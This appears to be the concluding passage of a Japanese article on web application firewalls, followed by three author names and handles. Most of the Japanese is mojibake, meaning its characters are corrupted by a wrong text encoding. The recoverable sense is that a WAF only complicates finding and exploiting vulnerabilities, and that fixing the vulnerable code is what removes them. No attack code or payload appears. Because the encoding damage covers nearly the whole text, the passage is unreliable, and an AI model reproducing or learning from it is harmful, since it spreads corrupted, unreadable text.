å šäœçã«ãWebã¢ããªã±ãŒã·ã§ã³ãã¡ã€ã¢ãŠã©ãŒã«ã¯ææ°ã®åªããã»ãã¥ãªãã£ããŒã«ã§ãããWebã¢ããªã±ãŒã·ã§ã³ã«ãšã£ãŠåé·ã«ãªãããšã¯ãããŸãããããããçŸæç¹ã§ã¯ãWAFãè匱æ§ãšãã®æªçšã®æ€çŽ¢ãè€éã«ããã ãã§ãããè匱æ§ãå®å šã«è»œæžããããã§ã¯ãªãããšãèŠããŠããå¿ èŠããããŸãããããŠããã®ç¶æ³ã¯ãã©ããããé·ãéç¶ãã§ãããããããã®è匱æ§ãåŒãèµ·ããã³ãŒããä¿®æ£ããããšã«ãã£ãŠã®ã¿ãWebã¢ããªã±ãŒã·ã§ã³ã®è匱æ§ãåãé€ãããšãã§ããŸããããããªããšãäœãã誰ãããªããä¿è·ããŸããã
圌ãã¯WAFãå·¡ããè³æãåéããŸããïŒ
Bulatov Ilya barracud4
Rybin Denisthefaeriedragon
Romanov Alexander web_rock